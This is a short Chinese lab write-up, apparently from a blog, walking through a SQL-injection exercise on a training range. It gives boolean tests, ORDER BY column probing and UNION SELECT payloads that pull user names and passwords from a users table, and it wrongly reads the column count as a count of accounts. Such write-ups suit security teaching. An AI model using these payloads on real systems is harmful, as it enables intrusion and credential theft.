在虚拟机chrome输入靶场网址:

10.1.1.11:81

打开实验一。

此时用到语句:       name = root' and '1' = '1

name = root' and '1' = '2

接下来用order by 语句:

root' order by 4%23
root' order by 5%23
root' order by 6%23

4,5正常,6异常。

即查询出有五个账户。

root' union select 1,2,3,4,5 from users%23

root' union select 1,name,passwd,4,5 from users%23

实验一即以上操作。

合天网安实验室sql注入实验一 WRITE UP相关推荐

  1. BurpSuite实战——合天网安实验室学习笔记

    burpsuite是一款功能强大的用于攻击web应用程序的集成平台,通常在服务器和客户端之间充当一个双向代理,用于截获通信过程中的数据包,对于截获到的包可以人为的进行修改和重放. 此BurpSuite ...

  2. 合天网安就业班_CTF挑战赛-合天网安实验室

    [TOCCTF挑战赛-合天网安实验室逆向解析] CTF挑战赛-合天网安实验室​sourl.cn 1.逆向100 修改后缀为.apk 安卓模拟器打开,发现要求输入Password 用Android逆向助 ...

  3. 合天网安实验室CTF-基础50-0x01

    合天网安实验室CTF-基础50-0x01 最近无聊时准备刷点题,由简到难慢慢来吧 题目描述   真的不能再简单了! 相关附件   misc50.zip 题目链接 参考解题步骤 1.下载下来的压缩包解压 ...

  4. 合天网安实验室CTF-Web100-Give Me Flag

    合天网安实验室CTF-Web100-Give Me Flag 题目描述   哎,不小心把代码弄乱惹 相关附件   web100.zip 题目链接 参考解题步骤 1.下载附件打开后是一段JavaScri ...

  5. 合天网安实验室CTF-Exp200-Come on,Exploit me!

    合天网安实验室CTF-Exp200-Come on,Exploit me! 题目描述   Audrey Tang. ⊙.⊙ 我只能说到这儿了 相关附件   exp200 题目链接 参考解题步骤 1.下 ...

  6. 合天网安实验室CTF-Steg150-一段欢快的曲调

    合天网安实验室CTF-Steg150-一段欢快的曲调 题目描述   滴滴 相关附件   stego100.wav 题目链接 参考解题步骤 1.下载的附件是一段wav格式的音频,打开听了一下,确实是欢快 ...

  7. 合天网安实验室CTF-解密100-Funny Crypto

    合天网安实验室CTF-解密100-Funny Crypto 题目描述   tgbnjuy 8ujko9 5rfgy6 相关附件 题目链接 参考解题步骤 字母 被围起来的字母 图示颜色 tgbnjuy ...

  8. CSRF攻击实验 ——合天网安实验室学习笔记

    实验链接 本实验以PHP和Mysql为环境,展示了CSRF攻击的原理和攻击过程.通过实验结果结合对攻击代码的分析,可更直观清晰地认识到Web安全里这种常见的攻击方式. 链接:http://www.he ...

  9. Docker未授权漏洞复现(合天网安实验室)

    简介 Docker 是一个开源的应用容器引擎,让开发者可以打包他们的应用以及依赖包到一个可移植的容器中,然后发布到任何流行的Linux或Windows操作系统的机器上,也可以实现虚拟化,容器是完全使用 ...

  10. 使用burp进行暴力破解 ——合天网安实验室学习笔记

    实验链接 通过该实验掌握burp的配置方法和相关模块的使用方法,对一个虚拟网站使用burp进行暴力破解来使网站建设者从攻击者的角度去分析和避免问题,以此加强网站安全. 链接:http://www.he ...

最新文章

  1. Truncate a string
  2. UGUI 帧动画插件
  3. reflective dll injection 反射注入
  4. 2021牛客暑期多校训练营8 OR 相加和与和或-dfs判断假设情况是否有矛盾
  5. 本机电脑与 Android 设备如何进行文件传输?
  6. linux系统输入指令,详解linux系统输入输出管理和vim的常用功能
  7. 前端学习(2669): vue3.0实战开始建立新项目
  8. 洗礼灵魂,修炼python(42)--巩固篇—type内置函数与类的千丝万缕关系
  9. 搭建 | 一步成功搭建Centos + Kubernetes 环境
  10. thin还是thick(续),实证新结论!
  11. elasticsearch中head插件中的定制增加用户名密码范例
  12. Android 获取网页的视频链接
  13. 关于“硬件工程师工资不高”的几个真相
  14. 【GeoFans】GNSS相关产品团队
  15. 谷歌浏览器设置缓存方法
  16. 使用DLL引起的error LNK2019: 无法解析的外部符号
  17. 沈阳市举行盛大剪纸节 民间艺人现场传承工艺
  18. 不能安装QQ2009SP6
  19. 会声会影如何调整素材的运行速度?
  20. vSphere 5 VMs 3D加速启动/禁用

热门文章

  1. 微分几何学习(一)(向量函数)
  2. 三国杀诺基亚java_拍照手机「三国杀」:诺基亚 808 PureView、iPhone 4S、HTC One S 大比拼...
  3. 测试开发 - 十年磨一剑(序)
  4. python 等值面_三维等值面提取算法(Dual Contouring)
  5. AWSome Day 2019 线上云技术课堂(2)
  6. LHC有望揭示新的物理学理论
  7. keil5c语言定义引脚,keil编写C程序是不是不能在函数内定义变量啊,求大神
  8. 认清有毒的矿物质元素 预防中毒
  9. 政务大数据的上下文范围
  10. apng2gif各种问题的解决